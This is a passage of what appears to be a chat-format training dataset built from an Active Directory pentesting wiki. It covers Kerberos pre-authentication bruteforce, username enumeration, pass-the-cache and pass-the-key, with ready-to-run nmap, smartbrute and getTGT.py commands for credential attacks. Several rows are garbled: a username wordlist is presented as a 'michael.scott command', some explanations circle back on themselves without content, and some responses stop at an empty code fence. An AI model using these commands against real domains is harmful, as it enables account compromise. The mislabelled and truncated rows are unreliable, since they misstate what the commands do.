bruteforce the account's password. This is called ASREProast.\n\nLast but not least, the pre-authentication step can be bruteforced. This type of credential bruteforcing is way faster and stealthier than other bruteforcing methods relying on NTLM. Pre-authentication bruteforcing can even be faster by using UDP as the transport protocol, hence requiring less frames to be sent.\n\nOn a side note, it is possible to enumerate domain users in a similar manner.", "metadata": {"corpus_index": 657, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Pre-auth bruteforce - Users enum"}, {"role": "assistant", "content": "nmap's krb5-enum-users script allows to know wether a username is valid or not (domain-wise) through a legitimate Kerberos service.\n\n> [!TIP]\n> A TGT request is made through an AS-REQ message. When an invalid username is requested, the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN in the AS-REP message. When working with a valid username, either a TGT will be obtained, or an error like KRB5KDC_ERR_PREAUTH_REQUIRED will be raised (i.e. in this case, indicating that the user is required to perform preauthentication).\n\nThe first step in enumerating the usernames is to create a wordlist (by guessing it or by looking for possible associations on social networks).\n\n``\nmichael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone\n`\n\nThe enumeration can then be started.\n\n`bash\nnmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC\n``"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Pre-auth bruteforce - Users enum", "response": "nmap's krb5-enum-users script allows to know wether a username is valid or not (domain-wise) through a legitimate Kerberos service.\n\n> [!TIP]\n> A TGT request is made through an AS-REQ message. When an invalid username is requested, the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN in the AS-REP message. When working with a valid username, either a TGT will be obtained, or an error like KRB5KDC_ERR_PREAUTH_REQUIRED will be raised (i.e. in this case, indicating that the user is required to perform preauthentication).\n\nThe first step in enumerating the usernames is to create a wordlist (by guessing it or by looking for possible associations on social networks).\n\n``\nmichael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone\n`\n\nThe enumeration can then be started.\n\n`bash\nnmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC\n``", "metadata": {"corpus_index": 658, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Pre-auth bruteforce - Users enum"}, {"role": "assistant", "content": "nmap's krb5-enum-users script allows to know wether a username is valid or not (domain-wise) through a legitimate Kerberos service.\n\n> [!TIP]\n> A TGT request is made through an AS-REQ message. When an invalid username is requested, the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN in the AS-REP message. When working with a valid username, either a TGT will be obtained, or an error like KRB5KDC_ERR_PREAUTH_REQUIRED will be raised (i.e. in this case, indicating that the user is required to perform preauthentication).\n\nThe first step in enumerating the usernames is to create a wordlist (by guessing it or by looking for possible associations on social networks).\n\n``\nmichael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone\n`\n\nThe enumeration can then be started.\n\n`bash\nnmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC\n``"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Pre-auth bruteforce - Users enum", "response": "nmap's krb5-enum-users script allows to know wether a username is valid or not (domain-wise) through a legitimate Kerberos service.\n\n> [!TIP]\n> A TGT request is made through an AS-REQ message. When an invalid username is requested, the server will respond using the Kerberos error code KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN in the AS-REP message. When working with a valid username, either a TGT will be obtained, or an error like KRB5KDC_ERR_PREAUTH_REQUIRED will be raised (i.e. in this case, indicating that the user is required to perform preauthentication).\n\nThe first step in enumerating the usernames is to create a wordlist (by guessing it or by looking for possible associations on social networks).\n\n``\nmichael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone\n`\n\nThe enumeration can then be started.\n\n`bash\nnmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC\n``", "metadata": {"corpus_index": 658, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the michael.scott command to pre-auth bruteforce - users enum"}, {"role": "assistant", "content": "michael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the michael.scott command to pre-auth bruteforce - users enum", "response": "michael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone", "metadata": {"corpus_index": 659, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "michael.scott"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pre-auth bruteforce - Users enum"}, {"role": "assistant", "content": "michael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pre-auth bruteforce - Users enum", "response": "michael.scott\njim.halpert\noscar.martinez\npam.beesly\nkevin.malone", "metadata": {"corpus_index": 659, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `michael.scott`?"}, {"role": "assistant", "content": "This command is used for pre-auth bruteforce - users enum. Users enum"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `michael.scott`?", "response": "This command is used for pre-auth bruteforce - users enum. Users enum", "metadata": {"corpus_index": 659, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the nmap command to pre-auth bruteforce - users enum"}, {"role": "assistant", "content": "nmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the nmap command to pre-auth bruteforce - users enum", "response": "nmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC", "metadata": {"corpus_index": 660, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "nmap"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Pre-auth bruteforce - Users enum during a pentest?"}, {"role": "assistant", "content": "nmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Pre-auth bruteforce - Users enum during a pentest?", "response": "nmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC", "metadata": {"corpus_index": 660, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `nmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC`?"}, {"role": "assistant", "content": "This command is used for pre-auth bruteforce - users enum. Users enum"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `nmap -p 88 --script=\"krb5-enum-users\" --script-args=\"krb5-enum-users.realm='$DOMAIN',userdb=$WORDLIST\" $IP_DC`?", "response": "This command is used for pre-auth bruteforce - users enum. Users enum", "metadata": {"corpus_index": 660, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Pre-auth bruteforce - Pre-auth Bruteforce?"}, {"role": "assistant", "content": "Tools like kerbrute (Go) and smartbrute (Python) can be used to bruteforce credentials through the Kerberos pre-authentication. The smartbrute utility can be used in a brute mode (standard bruteforcing features) or in a smart mode (requires prior knowledge of a low-priv user credentials, but operates LDAP enumeration and avoid locking out accounts, fetches the users list and so on).\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Pre-auth bruteforce - Pre-auth Bruteforce?", "response": "Tools like kerbrute (Go) and smartbrute (Python) can be used to bruteforce credentials through the Kerberos pre-authentication. The smartbrute utility can be used in a brute mode (standard bruteforcing features) or in a smart mode (requires prior knowledge of a low-priv user credentials, but operates LDAP enumeration and avoid locking out accounts, fetches the users list and so on).\n\n```bash", "metadata": {"corpus_index": 661, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pre-auth bruteforce - Pre-auth Bruteforce"}, {"role": "assistant", "content": "Tools like kerbrute (Go) and smartbrute (Python) can be used to bruteforce credentials through the Kerberos pre-authentication. The smartbrute utility can be used in a brute mode (standard bruteforcing features) or in a smart mode (requires prior knowledge of a low-priv user credentials, but operates LDAP enumeration and avoid locking out accounts, fetches the users list and so on).\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pre-auth bruteforce - Pre-auth Bruteforce", "response": "Tools like kerbrute (Go) and smartbrute (Python) can be used to bruteforce credentials through the Kerberos pre-authentication. The smartbrute utility can be used in a brute mode (standard bruteforcing features) or in a smart mode (requires prior knowledge of a low-priv user credentials, but operates LDAP enumeration and avoid locking out accounts, fetches the users list and so on).\n\n```bash", "metadata": {"corpus_index": 661, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does brute mode, users and passwords lists supplied work?"}, {"role": "assistant", "content": "smartbrute.py brute -bU $USER_LIST -bP $PASSWORD_LIST kerberos -d $DOMAIN"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does brute mode, users and passwords lists supplied work?", "response": "smartbrute.py brute -bU $USER_LIST -bP $PASSWORD_LIST kerberos -d $DOMAIN", "metadata": {"corpus_index": 662, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for brute mode, users and passwords lists supplied?"}, {"role": "assistant", "content": "smartbrute.py brute -bU $USER_LIST -bP $PASSWORD_LIST kerberos -d $DOMAIN"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for brute mode, users and passwords lists supplied?", "response": "smartbrute.py brute -bU $USER_LIST -bP $PASSWORD_LIST kerberos -d $DOMAIN", "metadata": {"corpus_index": 662, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is smart mode, valid credentials supplied for enumeration?"}, {"role": "assistant", "content": "smartbrute.py smart -bP $PASSWORD_LIST ntlm -d $DOMAIN -u $USER -p $PASSWORD kerberos\n``\n\n> [!NOTE]\n> In its default setup, smartbrute will attack Kerberos pre-authentication with the RC4 etype and the UDP transport protocol. While this configuration is the fastest, there are two downsides:\n> \n> * bruteforcing with the RC4 etype is not the stealthiest option\n> * using UDP can lead to some support issues. For instance, a valid authentication on a user part of too many groups could raise a KRB_ERR_RESPONSE_TOO_BIG error. When an authentication attempt is invalid, a common KDC_ERR_PREAUTH_FAILED` message should be raised. This allows for bruteforcing, but not authentication.\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is smart mode, valid credentials supplied for enumeration?", "response": "smartbrute.py smart -bP $PASSWORD_LIST ntlm -d $DOMAIN -u $USER -p $PASSWORD kerberos\n``\n\n> [!NOTE]\n> In its default setup, smartbrute will attack Kerberos pre-authentication with the RC4 etype and the UDP transport protocol. While this configuration is the fastest, there are two downsides:\n> \n> * bruteforcing with the RC4 etype is not the stealthiest option\n> * using UDP can lead to some support issues. For instance, a valid authentication on a user part of too many groups could raise a KRB_ERR_RESPONSE_TOO_BIG error. When an authentication attempt is invalid, a common KDC_ERR_PREAUTH_FAILED` message should be raised. This allows for bruteforcing, but not authentication.\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations.", "metadata": {"corpus_index": 663, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for smart mode, valid credentials supplied for enumeration?"}, {"role": "assistant", "content": "smartbrute.py smart -bP $PASSWORD_LIST ntlm -d $DOMAIN -u $USER -p $PASSWORD kerberos\n``\n\n> [!NOTE]\n> In its default setup, smartbrute will attack Kerberos pre-authentication with the RC4 etype and the UDP transport protocol. While this configuration is the fastest, there are two downsides:\n> \n> * bruteforcing with the RC4 etype is not the stealthiest option\n> * using UDP can lead to some support issues. For instance, a valid authentication on a user part of too many groups could raise a KRB_ERR_RESPONSE_TOO_BIG error. When an authentication attempt is invalid, a common KDC_ERR_PREAUTH_FAILED` message should be raised. This allows for bruteforcing, but not authentication.\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for smart mode, valid credentials supplied for enumeration?", "response": "smartbrute.py smart -bP $PASSWORD_LIST ntlm -d $DOMAIN -u $USER -p $PASSWORD kerberos\n``\n\n> [!NOTE]\n> In its default setup, smartbrute will attack Kerberos pre-authentication with the RC4 etype and the UDP transport protocol. While this configuration is the fastest, there are two downsides:\n> \n> * bruteforcing with the RC4 etype is not the stealthiest option\n> * using UDP can lead to some support issues. For instance, a valid authentication on a user part of too many groups could raise a KRB_ERR_RESPONSE_TOO_BIG error. When an authentication attempt is invalid, a common KDC_ERR_PREAUTH_FAILED` message should be raised. This allows for bruteforcing, but not authentication.\n\n> [!WARNING] Locking out accounts\n> As always when bruteforcing passwords in production environments, it is advised to be extra careful. Specific rule and custom tools can be put in place to lock accounts on too many failed attempts. Few offensive tools analyse granular policies. Fewer tools (none to my knowledge) enumerate custom defensive tools configurations.", "metadata": {"corpus_index": 663, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/pre-auth-bruteforce.md", "page_title": "Pre-auth bruteforce", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does Pass the cache work?"}, {"role": "assistant", "content": "This technique is equivalent to pass the ticket. Instead of using Kerberos tickets from, or found on, Windows systems, it's based of UNIX-like formatted tickets that serve the exact same purpose.\n\n> [!TIP]\n> Read the Pass the ticket article for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does Pass the cache work?", "response": "This technique is equivalent to pass the ticket. Instead of using Kerberos tickets from, or found on, Windows systems, it's based of UNIX-like formatted tickets that serve the exact same purpose.\n\n> [!TIP]\n> Read the Pass the ticket article for more insight", "metadata": {"corpus_index": 664, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptc.md", "page_title": "Pass the cache", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Pass the cache"}, {"role": "assistant", "content": "This technique is equivalent to pass the ticket. Instead of using Kerberos tickets from, or found on, Windows systems, it's based of UNIX-like formatted tickets that serve the exact same purpose.\n\n> [!TIP]\n> Read the Pass the ticket article for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Pass the cache", "response": "This technique is equivalent to pass the ticket. Instead of using Kerberos tickets from, or found on, Windows systems, it's based of UNIX-like formatted tickets that serve the exact same purpose.\n\n> [!TIP]\n> Read the Pass the ticket article for more insight", "metadata": {"corpus_index": 664, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptc.md", "page_title": "Pass the cache", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Pass the key - Theory"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. A Service Ticket (ST) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256.\n\n* When the RC4 etype is enabled, the RC4 key can be used. The problem is that the RC4 key is in fact the user's NT hash. Using a an NT hash to obtain Kerberos tickets is called overpass the hash.\n* When RC4 is disabled, other Kerberos keys (DES, AES-128, AES-256) can be passed as well. This technique is called pass the key. In fact, only the name and key used differ between overpass the hash and pass the key, the technique is the same."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Pass the key - Theory", "response": "The Kerberos authentication protocol works with tickets in order to grant access. A Service Ticket (ST) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256.\n\n* When the RC4 etype is enabled, the RC4 key can be used. The problem is that the RC4 key is in fact the user's NT hash. Using a an NT hash to obtain Kerberos tickets is called overpass the hash.\n* When RC4 is disabled, other Kerberos keys (DES, AES-128, AES-256) can be passed as well. This technique is called pass the key. In fact, only the name and key used differ between overpass the hash and pass the key, the technique is the same.", "metadata": {"corpus_index": 665, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Pass the key - Theory"}, {"role": "assistant", "content": "The Kerberos authentication protocol works with tickets in order to grant access. A Service Ticket (ST) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256.\n\n* When the RC4 etype is enabled, the RC4 key can be used. The problem is that the RC4 key is in fact the user's NT hash. Using a an NT hash to obtain Kerberos tickets is called overpass the hash.\n* When RC4 is disabled, other Kerberos keys (DES, AES-128, AES-256) can be passed as well. This technique is called pass the key. In fact, only the name and key used differ between overpass the hash and pass the key, the technique is the same."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Pass the key - Theory", "response": "The Kerberos authentication protocol works with tickets in order to grant access. A Service Ticket (ST) can be obtained by presenting a TGT (Ticket Granting Ticket). That prior TGT can be obtained by validating a first step named \"pre-authentication\" (except if that requirement is explicitly removed for some accounts, making them vulnerable to ASREProast).\n\nThe pre-authentication requires the requesting user to supply its secret key (DES, RC4, AES128 or AES256) derived from the user password. An attacker knowing that secret key doesn't need knowledge of the actual password to obtain tickets. This is called pass-the-key.\n\nKerberos offers 4 different key types: DES, RC4, AES-128 and AES-256.\n\n* When the RC4 etype is enabled, the RC4 key can be used. The problem is that the RC4 key is in fact the user's NT hash. Using a an NT hash to obtain Kerberos tickets is called overpass the hash.\n* When RC4 is disabled, other Kerberos keys (DES, AES-128, AES-256) can be passed as well. This technique is called pass the key. In fact, only the name and key used differ between overpass the hash and pass the key, the technique is the same.", "metadata": {"corpus_index": 665, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Pass the key - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script getTGT (Python) can request a TGT (Ticket Granting Ticket) given a password, hash (LMhash can be empty), or aesKey. The TGT will be saved as a .ccache file that can then be used by other Impacket scripts.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Pass the key - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script getTGT (Python) can request a TGT (Ticket Granting Ticket) given a password, hash (LMhash can be empty), or aesKey. The TGT will be saved as a .ccache file that can then be used by other Impacket scripts.\n\n```bash", "metadata": {"corpus_index": 666, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Pass the key - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script getTGT (Python) can request a TGT (Ticket Granting Ticket) given a password, hash (LMhash can be empty), or aesKey. The TGT will be saved as a .ccache file that can then be used by other Impacket scripts.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Pass the key - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script getTGT (Python) can request a TGT (Ticket Granting Ticket) given a password, hash (LMhash can be empty), or aesKey. The TGT will be saved as a .ccache file that can then be used by other Impacket scripts.\n\n```bash", "metadata": {"corpus_index": 666, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is with an NT hash (overpass-the-hash)?"}, {"role": "assistant", "content": "getTGT.py -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is with an NT hash (overpass-the-hash)?", "response": "getTGT.py -hashes 'LMhash:NThash' $DOMAIN/$USER@$TARGET", "metadata": {"corpus_index": 667, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/ptk.md", "page_title": "Pass the key", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, 